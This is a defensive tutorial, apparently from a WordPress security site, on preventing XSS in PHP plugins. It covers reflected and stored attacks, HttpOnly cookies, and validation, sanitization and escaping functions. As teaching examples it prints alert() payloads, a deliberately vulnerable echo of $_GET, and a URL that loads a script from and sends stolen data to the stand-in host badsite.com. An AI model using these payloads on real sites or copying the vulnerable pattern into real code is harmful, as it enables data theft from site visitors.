How to Prevent Cross Site Scripting Attacks

2.2: How to Prevent Cross Site Scripting Attacks

Advanced
Updated January 4, 2017

Cross Site Scripting vulnerabilities are the most common vulnerability found in WordPress plugins by a significant margin. In an analysis that we did of 1599 WordPress plugin vulnerabilities reported over a 14 month period, we found the following distribution:

As you can tell from the above graphic, if you are able to fully understand and eliminate just the XSS vulnerabilities in your PHP code, you will be writing 47% fewer vulnerabilities. So let's spend some time discussing XSS: what it is, how it is exploited and how to prevent it.

What is an XSS vulnerability?

XSS vulnerabilities are incredibly easy to write. In fact, if you simply write PHP in a way that feels intuitive, you will almost certainly write an XSS vulnerability into your code. Thankfully XSS vulnerabilities are also very easy to recognize.

echo "The value you entered is: " . $_GET['val'];

That is a classic XSS vulnerability. If you include this code in a WordPress plugin, publish it and your plugin becomes popular, you can have no doubt that a security analyst will at some point contact you reporting this vulnerability. You will have to fix it and the analyst will publicly disclose it, leaving you slightly embarrassed, but with a more secure application.

So why is this an XSS vulnerability? The way the above code works is it grabs a value from the URL and writes it back to the browser, unvalidated and unfiltered. If your application is hosted at https://example.com/test.php a site visitor might visit the following URL:

https://example.com/test.php?val=123

They will then see: “The value you entered is: 123” output into their browser. Probably the way the application was designed to work.

If someone visits the following URL:

https://example.com/test.php?val=<script>alert('Proof this is an XSS');</script>

They will see the following in the browser: “The value you entered is:” and they will also see an alert box pop up saying “Proof this is an XSS”.
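For comparison, here is a minimal sketch of the same output with the value escaped before it is written to the page. It assumes plain PHP outside WordPress. The helper name render_entered_value() is hypothetical, and htmlspecialchars() is used as one common way to escape HTML; the WordPress escaping functions are covered later on this page.

```php
<?php
// Hypothetical helper: builds the message with the user-supplied value escaped.
function render_entered_value(string $val): string
{
    // ENT_QUOTES also encodes single and double quotes, so the value
    // cannot break out of a quoted HTML attribute either.
    return 'The value you entered is: ' . htmlspecialchars($val, ENT_QUOTES, 'UTF-8');
}

// In test.php this would replace the vulnerable echo, for example:
// $val = $_GET['val'] ?? '';
// echo render_entered_value(is_string($val) ? $val : '');
```

With this change the script tag from the URL above is sent to the browser as text, so it is displayed rather than executed.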

Why is unfiltered output dangerous?

A demonstration showing an alert box doesn’t seem like much of a threat. If you don’t fully understand the impact of an XSS vulnerability and someone reports this issue to you with an alert() box as a demonstration of the vulnerability, you might be inclined to not take it seriously. How can proof that you can execute javascript be proof of a serious security problem?

When an analyst sends you an alert() box as proof of a security vulnerability, they are showing that they can execute arbitrary javascript code in the browser. What they are really demonstrating is that by sending that URL to someone else, they can get that other person to execute arbitrary javascript in a browser.

One version of an exploit might look something like this:

https://example.com/test.php?val=<script src="http://badsite.com/badscript.js"></script>

The attacker will send that link to a victim. The steps are as follows:

  • The victim clicks the link and visits the site. Let’s assume they’re already signed into the website with administrator level access.
  • The link and the XSS vulnerability cause the script to load from an external website into the target web page.
  • The script will have full access to the browser DOM environment including any HTTP cookie not protected by the HttpOnly flag.
  • The script performs a malicious action as the signed-in user. It also steals data from the website accessible to the signed in user (e.g. private messages the user has received) and sends it to the attacker. The data can be sent in a variety of ways, but one way could be to load an image like this from an external website: http://badsite.com/badPretendImage.jpg?stolendata=secretDataValues. The badPretendImage.jpg is actually a script that serves up an image but also stores any data received.

That is the basic mechanism of exploitation for an XSS vulnerability: An attacker finds a way to get a victim to load their javascript using an XSS vulnerability in the website. They use that to steal data from browsers.

In the example above, we have loaded an external javascript file into the page. XSS vulnerabilities vary and for a particular vulnerability it might not be feasible to include <SCRIPT> tags that load an entire external script. If that does not work, what could work is to add javascript directly in the exploit that is executed and performs some malicious action.

What is the HttpOnly flag and why is it important?

Before Internet Explorer 6 SP1, cookies were accessible both to web servers when a browser made a request, and to javascript. In other words, a script running in the browser on a particular website could simply read all cookies that the website had set.

This provided much flexibility to developers but also allowed malicious scripts to read cookie values and send them anywhere on the Internet. If an attacker was able to exploit an XSS vulnerability, the first thing they would do would be to steal any cookies they could read. This would allow them to gain instant administrative level access to websites if the victim was signed into the target website as an administrator.

In 2002, Microsoft released Internet Explorer 6 Service Pack 1, which introduced an optional flag that could be set when a cookie was set. The flag is called HttpOnly, and it specifies that any cookie carrying it must not be readable by javascript and should only be sent over HTTP to the web server that set it. Hence the name ‘HttpOnly’. The feature was quickly adopted by other browser vendors because the security benefits were clear. This flag provided a robust way to protect sensitive cookies from XSS attacks. Today all major browser vendors support the HttpOnly flag.

WordPress also uses the HttpOnly flag to protect cookies, which prevents an attacker exploiting an XSS vulnerability from stealing sensitive cookies.
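Outside of WordPress, the flag can be set from PHP when the cookie is created. The following is a minimal sketch, not WordPress's own implementation. The helper names, the one-hour lifetime and the extra 'secure' and 'samesite' options are assumptions added for illustration; only 'httponly' is the flag discussed above.

```php
<?php
// Hypothetical helper: options for a cookie that scripts must not read.
function protected_cookie_options(int $lifetimeSeconds): array
{
    return [
        'expires'  => time() + $lifetimeSeconds,
        'path'     => '/',
        'secure'   => true,  // assumption: the site is served over HTTPS
        'httponly' => true,  // the cookie is hidden from document.cookie
        'samesite' => 'Lax', // assumption: not sent on most cross-site requests
    ];
}

// Hypothetical helper: sets the cookie using the options above.
// The array form of setcookie() requires PHP 7.3 or later.
function set_protected_cookie(string $name, string $value): bool
{
    return setcookie($name, $value, protected_cookie_options(3600));
}
```

A cookie set this way is still sent to the server with each request, but a script injected through an XSS vulnerability cannot read its value.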

Tip: Changing the password of a WordPress user invalidates their cookies immediately. This can be used to sign out a user in the case of a suspected breach.

What is a Reflected XSS Vulnerability?

What we’ve discussed above is a reflected XSS vulnerability. A reflected XSS attack is usually a link that contains malicious code. When someone clicks on that link, they are taken to a vulnerable website and that malicious code is ‘reflected’ back into their browser to perform some malicious action.

Reflected XSS attacks are much less dangerous than stored XSS vulnerabilities (see below), mainly because they are hard to automate:

Reflected XSS attacks rely on a victim taking some kind of action whereby they visit the target website and cause it to generate content that performs a malicious action in their browser. This makes reflected XSS attacks very difficult or sometimes impossible to automate. Each victim must be targeted individually with an email or some other content that contains a malicious link which they need to click in order to be targeted in the attack.

Stored (or Persistent) XSS Vulnerabilities


A stored XSS attack is much more dangerous for two reasons.

First, a stored XSS attack can be automated. A script can be created that visits thousands of websites, exploits a vulnerability on each site and drops a stored XSS payload.

Second, victims in a stored XSS attack don’t have to take any action other than visiting the affected website. Anyone that visits the affected page on the site will become a victim because the stored malicious code will load in their browser. The victims do not need to take an additional action, like clicking an emailed link, to be affected.

A stored XSS attack occurs when an attacker sends malicious data to a website, which stores it in a database or some other storage mechanism. Then, when other site visitors visit a page or a specific URL, they are served that data, which executes and performs some kind of malicious action.

Let's look at an example:

[Screenshot: PHP source code of the guest book application]

The above code is a very basic guest book application. It’s also a classic example of a stored XSS vulnerability. When you load this application you will see a form asking you to sign a guest book that looks like this:

[Screenshot: the guest book form]

Once you sign the guest book a few times, you’ll see something like this:

[Screenshot: the guest book after several signatures]

If you enter some javascript in the signature text box that executes an alert box, you’ll see this:

[Screenshot: an alert box shown on the guest book page]

What happened here is a guest entered some javascript in the “Sign it” field that looks like this:

<script>alert('XSS Expoit worked');</script>

The javascript was stored and is now served up to every visitor to the guestbook page. This is a stored XSS vulnerability which has a much wider impact than a reflected XSS vulnerability. It can be used to steal data from every visitor to the affected page, not just visitors who click a specially crafted link. For this reason, stored XSS vulnerabilities are much more serious than reflected XSS.

This vulnerability is easy to fix: validate input, then sanitize and escape output. Let’s apply that to this script. Review the changes below.

[Screenshot: the guest book source code with validation, sanitization and escaping added]

As you can see in the above example, we’re validating the data using a regular expression, so only a small subset of characters is allowed in the guestbook. Even though we don’t allow HTML tags, we also run the data through PHP’s filter_var() function with the FILTER_SANITIZE_STRING filter, which removes any tags it finds and so catches anything that slips through due to a bug in our code. Note that FILTER_SANITIZE_STRING is deprecated as of PHP 8.1, where htmlspecialchars() is the usual replacement.

Then, when we output each record in the guestbook, we use filter_var with the FILTER_SANITIZE_FULL_SPECIAL_CHARS filter which does not strip out tags, but it escapes them if they are present. So in the example above we are validating and sanitizing on input and we are escaping on output. This provides plenty of protection against a stored XSS in the case of a guestbook.
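The original listing is not reproduced here, so the following is only a sketch of the same three steps: validate and sanitize on input, escape on output. The function names, the allowed character set and the 200-character limit are assumptions. strip_tags() is swapped in for FILTER_SANITIZE_STRING because that filter is deprecated in current PHP versions.

```php
<?php
// Hypothetical helper: validates and sanitizes a signature before it is stored.
// Returns null when the signature is rejected.
function guestbook_clean_input(string $raw): ?string
{
    $raw = trim($raw);

    // Validation: letters, digits, spaces and basic punctuation only,
    // 1 to 200 characters (an assumed rule). The D modifier makes $ match
    // only at the very end of the string.
    if (!preg_match('/^[A-Za-z0-9 .,!?\'-]{1,200}$/D', $raw)) {
        return null;
    }

    // Sanitization: remove any tags that slip past validation due to a bug.
    return strip_tags($raw);
}

// Hypothetical helper: escapes a stored signature for HTML output.
function guestbook_escape_output(string $stored): string
{
    return (string) filter_var($stored, FILTER_SANITIZE_FULL_SPECIAL_CHARS);
}
```

The escaping step is applied every time a record is printed, even though the input was already validated, so that data written by an older or buggy version of the code is still rendered harmless.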

A further note on the above code: You probably noticed a few other things we could make more secure. For example, we are storing our guestbook in a file which is in a web accessible folder. That means the raw data is readable by the public. This in itself is undesirable, and giving an attacker read access to a file that is not designed for public consumption may introduce further vulnerabilities. One way to solve this is to create a data file but give it a PHP extension. Then make the first line of the file contain the following:

<?php die("Nothing to see here!"); ?>

When you write to the file, make sure that first line stays intact. When you read the file, always discard the first line. Store the file with a .php extension e.g. data.php. Then if an attacker tries to access the file, the web server will treat it as executable PHP and immediately exit.
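A minimal sketch of this approach follows. The function names and the one-record-per-line layout are assumptions, and the sketch ignores concurrent first writes.

```php
<?php
// The guard line described above. It must stay the first line of the file.
const GUARD_LINE = '<?php die("Nothing to see here!"); ?>';

// Hypothetical helper: appends one record, creating the file with the
// guard line first if it does not exist yet.
function guarded_append(string $path, string $record): void
{
    if (!file_exists($path)) {
        file_put_contents($path, GUARD_LINE . "\n", LOCK_EX);
    }
    // Keep each record on a single line so reads stay line-based.
    $record = str_replace(["\r", "\n"], ' ', $record);
    file_put_contents($path, $record . "\n", FILE_APPEND | LOCK_EX);
}

// Hypothetical helper: returns all records, discarding the guard line.
function guarded_read(string $path): array
{
    if (!is_readable($path)) {
        return [];
    }
    $lines = file($path, FILE_IGNORE_NEW_LINES) ?: [];
    array_shift($lines); // drop the guard line
    return $lines;
}
```

Because the file is only ever appended to after creation, the guard line is never rewritten, and a direct request for data.php exits before any stored record is sent.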

Functions to Validate your Data

Validation in programming is when you verify that the data your application has received falls within constraints that you define to ensure it does not contain anything unreasonable, unnecessary or malicious. Validation is not a replacement for sanitization or escaping, because as we will see (in the section discussing filter_var() below), malicious data can get past some validation functions.

The constraints you will use vary, but they frequently are similar to the constraints used within a strictly typed language. For example, you might use some of the following checks:

  • Is the data an integer? (digits 0 to 9 only)
  • Is the data a float, with a decimal point allowed? (digits 0 to 9 and the . character)
  • Is the data numbers and dashes only, e.g. a credit card date field?
  • Is the data a string containing only numbers, letters, spaces and punctuation?
  • Is the data one of a limited number of options that can be selected, e.g. ‘option1’, ‘option2’, ‘option3’?

During validation if you reject data you will often return an error to the user describing the problem and asking them for correct data.

Below we have included functions that are frequently used by PHP developers to check if data received by an application is valid (to validate data). These are usually used in an if() statement to check if data is valid and if not, the application returns an error to the user.

  • is_numeric()
    What it does: Tests if data is a number or numeric string: digits 0 to 9 with an optional sign, decimal point and exponent.
    Example: is_numeric($input) will return true if $input == '-9.123'
  • preg_match()
    What it does: Tests if data matches a regular expression.
    Example: preg_match('/^[a-z]{2,3}$/', $input) returns 1 if $input is lowercase letters either 2 or 3 characters long. Note the ^ and $ in the regex.
  • filter_var()
    What it does: Tests if data conforms to a built-in PHP filter.
    Example: filter_var($input, FILTER_VALIDATE_EMAIL) tests if $input is a valid email address. Other useful filters are FILTER_VALIDATE_IP, FILTER_VALIDATE_URL, FILTER_VALIDATE_BOOLEAN. More filters are listed in the PHP manual.
  • in_array()
    What it does: Tests if data is one of a range of allowed values.
    Example: in_array($input, array('Windows', 'Linux', 'OSX', 'Other')) will return true if $input contains one of the allowed values. Great for <select> fields and radio buttons on web forms.
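The four functions above might be combined in a form handler along these lines. This is a sketch only: the function name, field names and error messages are hypothetical.

```php
<?php
// Hypothetical form handler: returns a list of error messages,
// or an empty array when every field is valid.
function validate_order(array $input): array
{
    $errors = [];

    // is_numeric(): accept numbers and numeric strings only.
    if (!is_numeric($input['quantity'] ?? null)) {
        $errors[] = 'Quantity must be a number.';
    }

    // preg_match(): two or three lowercase letters, whole string.
    $country = $input['country'] ?? '';
    if (!is_string($country) || !preg_match('/^[a-z]{2,3}$/D', $country)) {
        $errors[] = 'Country code must be 2 or 3 lowercase letters.';
    }

    // filter_var(): returns false when the value is not a valid email.
    if (filter_var($input['email'] ?? '', FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'Email address is not valid.';
    }

    // in_array(): strict comparison against a fixed list of options.
    if (!in_array($input['os'] ?? null, ['Windows', 'Linux', 'OSX', 'Other'], true)) {
        $errors[] = 'Please choose one of the listed operating systems.';
    }

    return $errors;
}
```

Passing true as the third argument to in_array() makes the comparison strict, which avoids surprises from PHP's loose type comparison.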

How to safely use regular expressions for validation

When using regular expressions with preg_match() to validate data, make sure that you match the entire string by using a caret ^ character at the start of your regular expression and a dollar sign $ at the end. These match the start and end of a string and will ensure that you aren’t just validating something in the middle of the input but are validating the whole string. Leaving these out creates a serious security problem because an attacker can include some valid data which will pass your test, but prepend or append anything malicious they want.
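The difference is easy to see with a short test. The input string below is made up for illustration. The last two lines show a related detail of PHP's regex engine: by default $ also matches just before a trailing newline, and the D modifier turns that off.

```php
<?php
$input = 'ab<script>alert(1)</script>';

// Unanchored: finds two or three lowercase letters somewhere in the
// string, so the malicious input passes the check.
$unanchored = preg_match('/[a-z]{2,3}/', $input);

// Anchored: the whole string must be two or three lowercase letters,
// so the same input is rejected.
$anchored = preg_match('/^[a-z]{2,3}$/', $input);

// By default $ also matches before a final newline character.
$trailingNewline = preg_match('/^[a-z]{2,3}$/', "ab\n");

// With the D modifier, $ matches only at the very end of the string.
$strict = preg_match('/^[a-z]{2,3}$/D', "ab\n");

var_dump($unanchored, $anchored, $trailingNewline, $strict);
```

If a trailing newline would matter for your data, add the D modifier or trim the input before validating it.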

Using filter_var() for validation does not replace sanitization or escaping.

In general, the filter_var() function is used as follows to validate data as it arrives in your application:

if($test = filter_var('test@example.com', FILTER_VALIDATE_EMAIL)){
        echo "Received: $test\n";
}

If you replace the email above with 'test@example.com<script>' you will see that the check fails and the echo statement is not executed.

Consider the following example which demonstrates how malicious data can get past a validation step. This shows how validation is no substitute for sanitization and escaping on output.

if($test = filter_var('http://example.com/?"><script>alert("XSS")</script><a"', FILTER_VALIDATE_URL)){
        echo "Received: $test\n";
}

The example above will output the following:

Received: http://example.com/?"><script>alert("XSS")</script><a"

This creates an XSS vulnerability if this output is unsanitized and unescaped. Changing the code as follows will remove the XSS vulnerability:

if($test = filter_var('http://example.com/?"><script>alert("XSS")</script><a"', FILTER_VALIDATE_URL)){
        echo "Received: " . esc_url($test) . "\n";
}

The above code will output the following, which is safe:

Received: http://example.com/?scriptalert(XSS)/scripta

See below for more information on functions you can use for escaping and sanitization.

Functions to Escape and Sanitize your Data

When you’re ready to output data back to a visitor’s web browser, a file, a network or some other place that data leaves your application, you will need to ensure the data you are outputting is safe. PHP and WordPress provide a variety of functions that escape and/or sanitize your data. It’s important to note that these functions will change your data if needed to make it safe.

PHP Built-in Sanitization and Escaping Functions

The following functions are built into PHP and you can use them whether or not you are running your application inside the WordPress environment. You’ll notice we provide several filter_var() examples. This is the new standard in PHP sanitization and is included by default with PHP since PHP version 5.2. We recommend using filter_var() instead of older PHP functions.

  • intval('123AA456')
    Output: 123
    Description: Sanitize integers.
  • filter_var('mark<script>@example.com', FILTER_SANITIZE_EMAIL)
    Output: markscript@example.com
    Description: Sanitize emails.
  • filter_var('Testing <tags> & chars.', FILTER_SANITIZE_SPECIAL_CHARS)
    Output: Testing &#60;tags&#62; &#38; chars.
    Description: Encode special chars.
  • filter_var('Strip <tag> & encode.', FILTER_SANITIZE_STRING)
    Output: Strip & encode.
    Description: Remove tags. (FILTER_SANITIZE_STRING is deprecated as of PHP 8.1.)
  • filter_var('Strip <tag> & encode.', FILTER_SANITIZE_STRING, FILTER_FLAG_ENCODE_LOW | FILTER_FLAG_ENCODE_HIGH | FILTER_FLAG_ENCODE_AMP)
    Output: Strip &#38; encode.
    Description: Remove tags with extra encoding flags. (FILTER_SANITIZE_STRING is deprecated as of PHP 8.1.)

WordPress API Sanitization Functions

WordPress includes a range of sanitization functions that are designed for specific use cases. We’ve included example usages below that give you an idea of how data is changed by these functions.

  • absint('-123ABC')
    Output: 123
    Description: Sanitize non-negative integers.
  • sanitize_email("!#$%^&*()__+=-{}|\][:\"\';<>?/.,test@example.com")
    Output: !#$%^&*__+=-{}|'?/.test@example.com
    Description: Sanitize email addresses.
  • sanitize_file_name('.-_/path/to/file--name.txt')
    Output: pathtofile-name.txt
    Description: Sanitize filenames.
  • sanitize_html_class('class!@#$%^&*()-name_here.')
    Output: class-name_here
    Description: Sanitize CSS class names.
  • sanitize_key('KeY-Name!@#$%^&*()<>,.?/')
    Output: key-name
    Description: Sanitize keys for associative arrays.
  • sanitize_mime_type('text/plain-blah!@#$%^&*()}{[]":;><,.?/')
    Output: text/plain-blah*./
    Description: Sanitize mime types.
  • sanitize_option('thumbnail_size_h', '123ABC-_')
    Output: 123
    Description: Sanitize a WP option. Filtering type depends on the option name.
  • sanitize_sql_orderby('colName')
    Output: colName
    Description: Sanitize a column name used in SQL ‘order by’. Returns false if invalid chars are found.
  • sanitize_text_field('<tag>some text</tag>')
    Output: some text
    Description: Checks for invalid UTF-8, converts single < characters to entities, strips all tags, removes line breaks, tabs and extra white space, and strips octets.
  • sanitize_title('<tag><?php //blah ?>Title here')
    Output: title-here
    Description: Turns text into a slug-style title for use in a URL.
  • sanitize_user('<tag>123ABCdef _.-*@name!#$', true)
    Output: 123ABCdef _ .-@name
    Description: Sanitize WP usernames. Second param enables strict sanitization.

WordPress API Escaping Functions

WordPress also includes escaping functions for general use. We have included the main functions below with example input and output to illustrate their use.

  • esc_html('<tag> & text')
    Output: &lt;tag&gt; &amp; text
    Comments: Escape HTML for safe browser output.
  • esc_url('http://example.com/<script>alert("TEST");</script>')
    Output: http://example.com/scriptalert(TEST);/script
    Comments: Escape URLs to make them safe for output as text or HTML attributes.
  • esc_js('alert("1");')
    Output: alert(&quot;1&quot;);
    Comments: Escapes Javascript to make it safe for inline HTML use e.g. in onclick handler.
  • esc_attr('attr-<>&\'"name')
    Output: attr-&lt;&gt;&amp;&#039;&quot;name
    Comments: Use to escape HTML attributes e.g. alt, title, value, etc.
  • esc_textarea('Text <tag> & text')
    Output: Text &lt;tag&gt; &amp; text
    Comments: Escape text for output in <textarea> element.

The wp_kses() function

wp_kses() is a more complex sanitization function. It strips evil scripts, which is where the name comes from: “kses strips evil scripts”. When you use wp_kses() you need to pass an array of allowed tags, with the allowed attributes for each tag, as the second parameter. Here’s an example:

$allowed = array( 
   'a' => array( 'href' => array(), 'title' => array() ), 
   'br' => array(), 
   'em' => array(), 
   'strong' => array(), 
);

echo wp_kses($output, $allowed);

The above will allow the ‘A’ tag with ‘href’ and ‘title’ attributes. It will also allow the following tags with no attributes: br, em and strong. If attributes are included with those tags, they will be stripped out.

wp_kses() is very processor intensive because the code is complex. So in general we recommend you first try to use built in PHP functions because they are fastest, then the simpler WordPress sanitization and escaping functions, and then only use wp_kses() if you must. That will give you the best performance for your plugin or theme.

Conclusion

By following the basic guidelines on this page you can avoid the most common vulnerabilities that are introduced into code. In general, spending time on input validation and output sanitization and escaping will make your application safe.

When choosing functions for sanitization and escaping, choose the function that most closely matches your specific use case. If you are outputting data into an HTML attribute, use a sanitization or escaping function specific for HTML attributes. This will give you the best combination of application performance and security.
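To illustrate why the output context matters, here is a sketch in plain PHP with one helper per context. The helper names are hypothetical. Inside WordPress you would normally reach for esc_html(), esc_attr(), esc_url() and esc_js() from the tables above instead.

```php
<?php
// Hypothetical helper: text placed between HTML tags or inside a
// quoted attribute value.
function for_html_text(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical helper: a single value placed in a URL query string.
function for_url_param(string $v): string
{
    return rawurlencode($v);
}

// Hypothetical helper: a string literal placed inside an inline <script>
// block. The JSON_HEX_* flags encode <, >, &, ' and " as \uXXXX escapes
// so the value cannot close the script element.
function for_inline_script(string $v): string
{
    return (string) json_encode(
        $v,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE
    );
}
```

The same input needs a different encoding in each place, which is why a single catch-all escaping function applied everywhere tends to leave gaps.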

If you are able to avoid XSS vulnerabilities and secure your application output, you will avoid almost half of all vulnerabilities that might be introduced into your application.
